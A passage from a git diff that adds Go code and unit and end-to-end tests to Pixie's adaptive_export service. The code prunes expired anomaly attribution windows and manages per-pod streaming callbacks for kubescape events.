+ return time.Unix(int64(et), 0).UTC() // seconds
+ case et < 1e13:
+ return time.Unix(0, int64(et)*int64(time.Millisecond)).UTC() // millis
+ default:
+ return time.Unix(0, int64(et)).UTC() // nanos
+ }
+}
+
+// PruneExpired removes from the in-memory active set every entry whose
+// t_end has been in the past longer than a grace period. ClickHouse's
+// ReplacingMergeTree handles table-side cleanup; this just keeps the
+// operator's RAM bounded.
+//
+// The grace period (2 * cfg.After by default) bridges the gap between
+// the prune timer and the next detection cycle: without it, a
+// same-hash alert arriving milliseconds after a prune ran would spawn
+// a fresh pushPixieRows goroutine, re-scanning the slice from
+// initial.TStart and wasting Pixie query budget on data we already
+// scanned. Empirically (2026-05-15) the un-graced prune accounted for
+// 100% of pushPixieRows goroutine exits, none reached the natural
+// "window expired" path — the prune kept racing reactivation.
+//
+// Caller invokes on a periodic timer.
+func (c *Controller) PruneExpired() int {
+ now := c.clock.Now()
+ grace := 2 * c.cfg.After
+ // Collect under the lock; fire callbacks AFTER releasing so we
+ // don't hold the controller mutex across user code.
+ //
+ // IMPORTANT (rev-3 streaming correctness): c.active is keyed by
+ // anomaly hash, but the streaming layer (ActiveSet) is keyed by
+ // (namespace, pod). One pod can host multiple distinct hashes
+ // (e.g. pgsql-server has hashes for postgres, pg_isready, runc:
+ // [2:INIT] processes). Firing OnPrune for every evicted hash
+ // would prematurely stop streaming for a pod that still has
+ // other active hashes. So: compute the set of pods that have
+ // NO remaining active hashes after this prune, and only fire
+ // OnPrune for those.
+ type podKey struct{ namespace, pod string }
+ prunedHashes := 0
+ var pruned []podKey
+ c.mu.Lock()
+ // Pass 1: delete expired hashes and remember which pods THEY
+ // belonged to.
+ candidatePods := map[podKey]struct{}{}
+ for h, row := range c.active {
+ if !row.TEnd.Add(grace).After(now) {
+ candidatePods[podKey{row.Namespace, row.Pod}] = struct{}{}
+ delete(c.active, h)
+ prunedHashes++
+ }
+ }
+ // Pass 2: from candidatePods, remove any pod that STILL has at
+ // least one surviving hash in c.active. What's left is the set
+ // of pods that lost their LAST hash — these get OnPrune.
+ for _, row := range c.active {
+ delete(candidatePods, podKey{row.Namespace, row.Pod})
+ }
+ for pk := range candidatePods {
+ pruned = append(pruned, pk)
+ }
+ c.mu.Unlock()
+ if c.cfg.OnPrune != nil {
+ for _, k := range pruned {
+ c.cfg.OnPrune(k.namespace, k.pod)
+ }
+ }
+ return prunedHashes
+}
diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go
new file mode 100644
index 00000000000..03b5471c070
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go
@@ -0,0 +1,681 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package controller
+
+import (
+ "context"
+ "errors"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// ---------- fakes ----------
+
+type fakeTrigger struct {
+ ch chan kubescape.Event
+ err error
+}
+
+func newFakeTrigger() *fakeTrigger { return &fakeTrigger{ch: make(chan kubescape.Event, 16)} }
+
+func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) {
+ if f.err != nil {
+ return nil, f.err
+ }
+ return f.ch, nil
+}
+
+func (f *fakeTrigger) push(ev kubescape.Event) { f.ch <- ev }
+func (f *fakeTrigger) close() { close(f.ch) }
+
+type fakeSink struct {
+ mu sync.Mutex
+ writes []sink.AttributionRow
+ preload []sink.AttributionRow
+ werr error
+ qerr error
+}
+
+func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error {
+ return nil
+}
+
+func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ if f.werr != nil {
+ return f.werr
+ }
+ f.writes = append(f.writes, rows...)
+ return nil
+}
+
+func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ if f.qerr != nil {
+ return nil, f.qerr
+ }
+ out := make([]sink.AttributionRow, 0, len(f.preload))
+ for _, r := range f.preload {
+ if r.Hostname == hostname {
+ out = append(out, r)
+ }
+ }
+ return out, nil
+}
+
+func (f *fakeSink) snapshot() []sink.AttributionRow {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ return append([]sink.AttributionRow{}, f.writes...)
+}
+
+type fakeClock struct {
+ mu sync.Mutex
+ t time.Time
+}
+
+func (c *fakeClock) Now() time.Time { c.mu.Lock(); defer c.mu.Unlock(); return c.t }
+func (c *fakeClock) advance(d time.Duration) {
+ c.mu.Lock()
+ defer c.mu.Unlock()
+ c.t = c.t.Add(d)
+}
+
+// ---------- helpers ----------
+
+var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC()
+
+func canonicalEvent() kubescape.Event {
+ return kubescape.Event{
+ Target: anomaly.Target{
+ PID: 106040, Comm: "redis-server",
+ Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis",
+ },
+ EventTime: 1744477360303026359,
+ RuleID: "R1005",
+ Hostname: "node-1",
+ }
+}
+
+func anotherTargetEvent() kubescape.Event {
+ ev := canonicalEvent()
+ ev.Target.PID = 999999
+ ev.RuleID = "R0006"
+ return ev
+}
+
+func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) {
+ t.Helper()
+ stop := time.Now().Add(deadline)
+ for time.Now().Before(stop) {
+ if ok() {
+ return
+ }
+ time.Sleep(2 * time.Millisecond)
+ }
+ t.Fatalf("timeout waiting for %s", what)
+}
+
+func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() {
+ t.Helper()
+ ctx, cancel := context.WithCancel(context.Background())
+ done := make(chan struct{})
+ go func() { _ = c.Run(ctx); close(done) }()
+ return func() {
+ trig.close()
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(1 * time.Second):
+ t.Fatalf("controller did not stop within 1s")
+ }
+ }
+}
+
+func defaultCfg() Config {
+ return Config{Hostname: "node-1", Before: 5 * time.Minute, After: 5 * time.Minute}
+}
+
+// ---------- tests ----------
+
+// TestController_NewWindow_FirstAnomalyOnTarget — first event on a hash
+// produces one Sink write with t_start = event - Before, t_end = now + After.
+func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime.Add(time.Second)}
+ c := New(trig, snk, defaultCfg(), clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 })
+ got := snk.snapshot()[0]
+ wantHash := anomaly.Hash(canonicalEvent().Target)
+ if got.AnomalyHash != wantHash {
+ t.Fatalf("hash = %q, want %q", got.AnomalyHash, wantHash)
+ }
+ if got.PID != 106040 || got.Comm != "redis-server" || got.Namespace != "redis" {
+ t.Fatalf("identity wrong: %+v", got)
+ }
+ if got.Hostname != "node-1" {
+ t.Fatalf("Hostname = %q", got.Hostname)
+ }
+ wantStart := canonicalEventTime.Add(-5 * time.Minute)
+ if !got.TStart.Equal(wantStart) {
+ t.Fatalf("TStart = %v, want %v", got.TStart, wantStart)
+ }
+ wantEnd := clk.Now().Add(5 * time.Minute)
+ if !got.TEnd.Equal(wantEnd) {
+ t.Fatalf("TEnd = %v, want %v", got.TEnd, wantEnd)
+ }
+ if got.NAnomalies != 1 || got.LastRuleID != "R1005" {
+ t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got)
+ }
+}
+
+// TestController_Coalesce_SecondAnomalySameHash — second event on the
+// same target reuses the same row, increments n_anomalies, extends t_end.
+func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime.Add(time.Second)}
+ c := New(trig, snk, defaultCfg(), clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 })
+
+ clk.advance(2 * time.Minute) // 2 minutes pass; t_end should reset to now+5min
+ ev2 := canonicalEvent()
+ ev2.RuleID = "R0006"
+ ev2.EventTime = uint64(canonicalEventTime.Add(2 * time.Minute).UnixNano())
+ trig.push(ev2)
+ waitFor(t, "second write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 })
+
+ if c.Active() != 1 {
+ t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active())
+ }
+ got := snk.snapshot()[1]
+ if got.NAnomalies != 2 {
+ t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies)
+ }
+ if got.LastRuleID != "R0006" {
+ t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID)
+ }
+ wantEnd := clk.Now().Add(5 * time.Minute)
+ if !got.TEnd.Equal(wantEnd) {
+ t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd)
+ }
+}
+
+// TestController_NeverShrinksTEnd — out-of-order arrivals or repeats
+// must not regress t_end backward.
+func TestController_NeverShrinksTEnd(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(trig, snk, defaultCfg(), clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 })
+ originalEnd := snk.snapshot()[0].TEnd
+
+ // fake clock REWINDS — pathological but defensive
+ clk.advance(-time.Hour)
+ trig.push(canonicalEvent())
+ waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 })
+ got := snk.snapshot()[1]
+ if !got.TEnd.Equal(originalEnd) {
+ t.Fatalf("TEnd regressed: was %v, now %v", originalEnd, got.TEnd)
+ }
+}
+
+// TestController_NewWindowForColdTarget — different target opens a 2nd
+// active row, preserving the first.
+func TestController_NewWindowForColdTarget(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(trig, snk, defaultCfg(), clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ trig.push(anotherTargetEvent())
+ waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 })
+}
+
+// TestController_Rehydrate_FromSink — boot reads still-active rows.
+func TestController_Rehydrate_FromSink(t *testing.T) {
+ trig := newFakeTrigger()
+ t0 := canonicalEventTime
+ preload := []sink.AttributionRow{
+ {AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5},
+ {AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1},
+ }
+ snk := &fakeSink{preload: preload}
+ clk := &fakeClock{t: t0}
+ c := New(trig, snk, defaultCfg(), clk)
+
+ if err := c.Rehydrate(context.Background()); err != nil {
+ t.Fatalf("Rehydrate: %v", err)
+ }
+ if c.Active() != 1 {
+ t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active())
+ }
+}
+
+// TestController_PruneExpired — entries past their t_end drop out.
+func TestController_PruneExpired(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(trig, snk, Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+ // PruneExpired() now waits for TEnd + 2*After (the grace period that
+ // prevents racing same-hash alerts arriving right after a prune from
+ // spawning fresh pushPixieRows goroutines that re-scan the slice).
+ // With Before=After=1m the row's TEnd is now+1m, so we need to advance
+ // past now+1m+2*1m = now+3m.
+ clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace
+ if r := c.PruneExpired(); r != 1 {
+ t.Fatalf("PruneExpired removed %d, want 1", r)
+ }
+ if c.Active() != 0 {
+ t.Fatalf("Active after prune = %d, want 0", c.Active())
+ }
+}
+
+// TestController_SinkErrorNonFatal — controller does not crash on Sink.Write error.
+func TestController_SinkErrorNonFatal(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{werr: errors.New("ch unreachable")}
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(trig, snk, defaultCfg(), clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ // Wait for the handler to process the event (no fixed sleep).
+ waitFor(t, "active=1 despite sink error", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+}
+
+// TestController_RestartMidStream_Aborts — context cancel terminates Run.
+func TestController_RestartMidStream_Aborts(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(trig, snk, defaultCfg(), clk)
+
+ ctx, cancel := context.WithCancel(context.Background())
+ done := make(chan struct{})
+ go func() { _ = c.Run(ctx); close(done) }()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(300 * time.Millisecond):
+ t.Fatalf("controller did not abort within 300ms of cancel")
+ }
+}
+
+// ────────────────────────────────────────────────────────────────
+// Callbacks (rev-3 streaming hook): OnAttribution + OnPrune
+// ────────────────────────────────────────────────────────────────
+
+type attrCall struct {
+ ns, pod string
+ tEnd time.Time
+}
+
+// TestController_OnAttribution_FiresPerEvent — every kubescape
+// event (new or extension) triggers exactly one OnAttribution.
+func TestController_OnAttribution_FiresPerEvent(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+
+ var mu sync.Mutex
+ var calls []attrCall
+ cfg := defaultCfg()
+ cfg.OnAttribution = func(ns, pod string, tEnd time.Time) {
+ mu.Lock()
+ defer mu.Unlock()
+ calls = append(calls, attrCall{ns, pod, tEnd})
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ trig.push(canonicalEvent()) // extension on same hash
+ trig.push(canonicalEvent())
+ waitFor(t, "3 attribution callbacks", 300*time.Millisecond, func() bool {
+ mu.Lock()
+ defer mu.Unlock()
+ return len(calls) == 3
+ })
+ mu.Lock()
+ defer mu.Unlock()
+ for _, c := range calls {
+ if c.pod == "" {
+ t.Fatalf("callback received empty pod: %+v", c)
+ }
+ if c.tEnd.IsZero() {
+ t.Fatalf("callback received zero tEnd: %+v", c)
+ }
+ }
+}
+
+// TestController_OnAttribution_NilIsNoop — nil callback must not crash.
+func TestController_OnAttribution_NilIsNoop(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ cfg := defaultCfg()
+ cfg.OnAttribution = nil // explicit
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+ trig.push(canonicalEvent())
+ waitFor(t, "event landed", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+ // No assertion needed beyond not panicking.
+}
+
+// TestController_OnPrune_FiresWithKeyDetails — PruneExpired must
+// emit one OnPrune callback per evicted hash, with ns + pod set.
+func TestController_OnPrune_FiresWithKeyDetails(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ var mu sync.Mutex
+ var pruned []attrCall
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ mu.Lock()
+ defer mu.Unlock()
+ pruned = append(pruned, attrCall{ns: ns, pod: pod})
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+ clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace
+ if r := c.PruneExpired(); r != 1 {
+ t.Fatalf("PruneExpired removed %d, want 1", r)
+ }
+ mu.Lock()
+ defer mu.Unlock()
+ if len(pruned) != 1 {
+ t.Fatalf("OnPrune fired %d times, want 1", len(pruned))
+ }
+ if pruned[0].pod == "" {
+ t.Fatalf("OnPrune called with empty pod: %+v", pruned[0])
+ }
+}
+
+// TestController_OnPrune_NilIsNoop — nil callback must not crash
+// the prune loop.
+func TestController_OnPrune_NilIsNoop(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ cfg := Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}
+ cfg.OnPrune = nil // explicit
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+ clk.advance(3*time.Minute + time.Second)
+ _ = c.PruneExpired()
+ // No panic = pass.
+}
+
+// TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone — multiple
+// anomaly hashes can share a single (namespace, pod) when distinct
+// PID×comm combinations on the same pod each get their own
+// kubescape rule firing. Real-world example (sweep observation):
+// pgsql-server has hashes for processes `postgres`, `pg_isready`,
+// and `runc:[2:INIT]` — three hashes, one pod.
+//
+// The streaming layer is pod-keyed, so OnPrune(ns, pod) must only
+// fire when the LAST hash for that pod is evicted. Premature firing
+// would stop the per-pod stream while other hashes are still active.
+// CR feedback (controller.go:156) caught this; see comment thread.
+func TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+
+ var mu sync.Mutex
+ var prunedPods []string
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ mu.Lock()
+ defer mu.Unlock()
+ prunedPods = append(prunedPods, ns+"/"+pod)
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ // Two events on the SAME pod but with different (PID, Comm) so
+ // anomaly.Hash returns two distinct hashes.
+ mkEvent := func(pid uint64, comm string) kubescape.Event {
+ return kubescape.Event{
+ Target: anomaly.Target{
+ PID: pid, Comm: comm, Pod: "pgsql-server-x", Namespace: "px",
+ },
+ EventTime: uint64(canonicalEventTime.UnixNano()),
+ RuleID: "R1", Hostname: "node-1",
+ }
+ }
+ trig.push(mkEvent(100, "postgres"))
+ trig.push(mkEvent(200, "pg_isready"))
+ waitFor(t, "two distinct hashes active", 300*time.Millisecond, func() bool {
+ return c.Active() == 2
+ })
+
+ // Advance past TEnd + 2*After so BOTH hashes are evictable.
+ clk.advance(3*time.Minute + time.Second)
+ if r := c.PruneExpired(); r != 2 {
+ t.Fatalf("PruneExpired removed %d, want 2 hashes", r)
+ }
+ mu.Lock()
+ defer mu.Unlock()
+ if len(prunedPods) != 1 {
+ t.Fatalf("OnPrune fired %d times for one pod with 2 hashes; want 1. Calls: %v",
+ len(prunedPods), prunedPods)
+ }
+ if prunedPods[0] != "px/pgsql-server-x" {
+ t.Fatalf("wrong pod pruned: %q", prunedPods[0])
+ }
+}
+
+// TestController_OnPrune_DoesNotFireWhileOtherHashesActive — inverse
+// case: only ONE hash on a pod expires; OnPrune must NOT fire for
+// that pod because other hashes for the same pod remain active.
+func TestController_OnPrune_DoesNotFireWhileOtherHashesActive(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+
+ var mu sync.Mutex
+ var prunedPods []string
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ mu.Lock()
+ defer mu.Unlock()
+ prunedPods = append(prunedPods, ns+"/"+pod)
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ mkEvent := func(pid uint64) kubescape.Event {
+ return kubescape.Event{
+ Target: anomaly.Target{
+ PID: pid, Comm: "c", Pod: "samepod", Namespace: "ns",
+ },
+ EventTime: uint64(canonicalEventTime.UnixNano()),
+ RuleID: "R1", Hostname: "node-1",
+ }
+ }
+ trig.push(mkEvent(100))
+ waitFor(t, "1 hash", 300*time.Millisecond, func() bool { return c.Active() == 1 })
+
+ // Advance time so first hash's TEnd is in the past but not yet
+ // past the 2*After grace. Then push second hash on the same pod.
+ clk.advance(2 * time.Minute)
+ trig.push(mkEvent(200))
+ waitFor(t, "2 hashes", 300*time.Millisecond, func() bool { return c.Active() == 2 })
+
+ // Advance to where the FIRST hash is past grace (3m after its
+ // creation) but the SECOND is still alive (its TEnd is at
+ // canonical+3m; grace would be +5m). Total clock progression
+ // from canonical: 2m + 1m + 1s = 3m1s.
+ clk.advance(time.Minute + time.Second)
+ removed := c.PruneExpired()
+ if removed != 1 {
+ t.Fatalf("PruneExpired removed %d, want 1 (only the old hash)", removed)
+ }
+ mu.Lock()
+ defer mu.Unlock()
+ if len(prunedPods) != 0 {
+ t.Fatalf("OnPrune fired for a pod that still has 1 active hash; calls: %v", prunedPods)
+ }
+}
+
+// TestController_OnAttribution_NotHeldUnderMutex — a slow callback
+// must NOT block PruneExpired's progress (the controller must not
+// be holding its own mutex while invoking user code).
+//
+// We arrange a synchronous OnPrune that blocks until we signal,
+// then call PruneExpired in a goroutine and confirm that we can
+// independently call Active() (which acquires the same mutex)
+// without deadlocking.
+func TestController_OnPrune_DoesNotHoldMutex(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+
+ pruneInCallback := make(chan struct{})
+ release := make(chan struct{})
+
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ close(pruneInCallback)
+ <-release
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+ clk.advance(3*time.Minute + time.Second)
+
+ pruneDone := make(chan struct{})
+ go func() {
+ _ = c.PruneExpired()
+ close(pruneDone)
+ }()
+
+ // Wait until the prune is inside the callback.
+ select {
+ case <-pruneInCallback:
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("OnPrune did not fire within 500ms")
+ }
+
+ // Active() acquires the same mutex; if PruneExpired holds it
+ // across the callback, this blocks forever.
+ activeDone := make(chan int, 1)
+ go func() { activeDone <- c.Active() }()
+
+ select {
+ case n := <-activeDone:
+ if n != 0 {
+ t.Fatalf("expected Active=0 (eviction happened before callback), got %d", n)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("Active() blocked — PruneExpired is holding the mutex across user callback")
+ }
+
+ close(release)
+ <-pruneDone
+}
+
+// TestEmptyResultSkip_NamespaceIsolation — the negative cache must
+// not let one namespace's empty-streak suppress queries for a same-
+// named pod in a different namespace. Two pods named "api" in "ns-a"
+// vs "ns-b" sharing a single PEM node previously collided because
+// the cache key was just "pod|table".
+func TestEmptyResultSkip_NamespaceIsolation(t *testing.T) {
+ clk := &fakeClock{t: canonicalEventTime}
+ c := New(newFakeTrigger(), &fakeSink{}, Config{
+ Hostname: "node-1",
+ Before: time.Minute,
+ After: time.Minute,
+ EmptyResultSkipAfterN: 2,
+ EmptyResultSkipTTL: 5 * time.Minute,
+ }, clk)
+
+ const table = "stirling_http_events"
+ // Drive ns-a/api to N empty results — should arm the skip cache for ns-a/api only.
+ for i := 0; i < 2; i++ {
+ c.noteQueryResult("ns-a", "api", table, 0)
+ }
+ if !c.shouldSkipEmpty("ns-a", "api", table) {
+ t.Fatalf("ns-a/api should be skip-armed after 2 empties")
+ }
+ if c.shouldSkipEmpty("ns-b", "api", table) {
+ t.Fatalf("ns-b/api was wrongly suppressed by ns-a/api's empty streak " +
+ "(skip cache key conflates namespaces)")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel
new file mode 100644
index 00000000000..0721c6caa60
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel
@@ -0,0 +1,31 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+pl_go_test(
+ name = "e2e_test",
+ srcs = [
+ "e2e_test.go",
+ "loadtest_test.go",
+ ],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/controller",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "//src/vizier/services/adaptive_export/internal/trigger",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go
new file mode 100644
index 00000000000..4f2f0c2fc94
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go
@@ -0,0 +1,176 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package e2e wires the real Trigger + real Sink (both HTTP-backed)
+// to a stub ClickHouse in-process and exercises the full
+// kubescape→attribution path end-to-end. This is the highest-fidelity
+// test that runs in `go test`. Real-cluster validation lives on the
+// lab.
+package e2e
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// stubClickHouse emulates ClickHouse's HTTP interface: GET responds
+// with a fixed kubescape_logs JSONEachRow body; POST records the
+// INSERT body for later assertion.
+type stubClickHouse struct {
+ mu sync.Mutex
+ kubescape []map[string]any
+ insertedSQL []string
+ insertBody [][]byte
+}
+
+func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) {
+ q := r.URL.Query().Get("query")
+ switch r.Method {
+ case http.MethodGet:
+ if !strings.Contains(q, "FROM forensic_db.kubescape_logs") {
+ http.Error(w, "unexpected SELECT: "+q, 400)
+ return
+ }
+ if !strings.Contains(q, "hostname = 'node-1'") {
+ http.Error(w, "missing hostname filter: "+q, 400)
+ return
+ }
+ s.mu.Lock()
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, row := range s.kubescape {
+ _ = enc.Encode(row)
+ }
+ s.mu.Unlock()
+ w.WriteHeader(200)
+ _, _ = w.Write(buf.Bytes())
+ case http.MethodPost:
+ body, _ := io.ReadAll(r.Body)
+ s.mu.Lock()
+ s.insertedSQL = append(s.insertedSQL, q)
+ s.insertBody = append(s.insertBody, body)
+ s.mu.Unlock()
+ w.WriteHeader(200)
+ default:
+ http.Error(w, "method", http.StatusMethodNotAllowed)
+ }
+}
+
+func (s *stubClickHouse) bodies() [][]byte {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ out := make([][]byte, len(s.insertBody))
+ for i, b := range s.insertBody {
+ out[i] = append([]byte{}, b...)
+ }
+ return out
+}
+
+func canonicalKubescapeRow() map[string]any {
+ return map[string]any{
+ "RuleID": "R1005",
+ "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`,
+ "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`,
+ "event_time": "1744477360303026359",
+ "hostname": "node-1",
+ }
+}
+
+// TestE2E_PushFlow_AttributionRowArrives — full chain: stub-CH serves a
+// kubescape row → real Trigger discovers and parses → real Controller
